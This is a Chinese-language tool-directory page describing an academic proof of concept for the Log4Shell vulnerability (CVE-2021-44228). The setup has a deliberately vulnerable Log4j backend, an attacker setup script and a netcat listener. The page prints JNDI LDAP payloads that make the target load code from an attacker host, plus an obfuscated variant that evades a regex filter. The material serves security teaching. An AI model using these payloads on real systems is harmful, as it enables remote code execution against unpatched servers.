Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
TPASLog4ShellPoC — Log4Shell漏洞(CVE-2021-44228)的概念验证,作为FCUP信息安全硕士课程中TPAS课程作业的一部分而开发。 | Kitploit
工具/GitHubGitHub/carlos-mesquita/tpaslog4shellpoc
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用WAF绕过学习与教育Archived
GitHubcarlos-mesquita/tpaslog4shellpoc

TPASLog4ShellPoC

Log4Shell漏洞(CVE-2021-44228)的概念验证,作为FCUP信息安全硕士课程中TPAS课程作业的一部分而开发。

查看仓库
171年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

TPAS Log4Shell PoC

此仓库包含 Log4Shell 漏洞(CVE-2021-44228)的概念验证(PoC),作为 FCUP 信息安全硕士课程中 TPAS 单元课程作业的一部分开发而成。

它包含:

  • 一个 React SPA 前端,模拟通用电子商务网站,具备浏览产品以及查看描述、价格、评分等基本信息的功能,数据通过虚拟 JSON API https://dummyjson.com/docs/products 提供
  • 一个 Spring Boot REST API 后端,使用存在漏洞的 Log4j 2.14 版本
  • 一个 Bash 脚本,用于设置利用 Log4Shell 所需的大部分攻击端组件

要运行此堆栈,你需要:

  • 在目标主机上:
    • 安装 docker
    • 将 docker-compose.yaml 中 NEXT_PUBLIC_BACKEND_URL 环境变量的值替换为 <target_ip>
    • 运行 docker-compose up
  • 在攻击主机上:
    • 安装 java、python 和 maven
    • 打开所需端口,运行 "./init.sh --help" 查看端口及脚本功能
    • 运行脚本 init.sh
    • 运行 netcat 监听器:nc -lvnp

一切就绪后:

将此 payload 放入搜索栏中(由于将作为 GET 查询参数传递,需进行 URL 编码):

root@kitploit:~
%24%7Bjndi%3Aldap%3A%2F%2F<attacker_host_ip>%3A<ldap_port>%2FExploit%7D

或者将此 payload 放入请求的头部(可使用 burp suite 拦截请求并进行篡改):

root@kitploit:~
${jndi:ldap://<attacker_host_ip>:<ldap_port>/Exploit}
}

在网站上,用户名称旁边有一个图标,用于切换是否使用正则表达式 \\$\\{jndi:.*?} 对记录的字符串进行清理。默认情况下,清理功能是禁用的,显示为红色恶魔图标。启用清理时,图标会变为绿色笑脸。

此功能可用于模拟 WAF 绕过,你可以在后端的 LoggerManager.java 类中添加更多正则表达式。

以下是一个不会被当前正则表达式匹配到的 payload:

${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://<attacker_host_ip>:<ldap_port>/Exploit}

root@kitploit:~
下载工具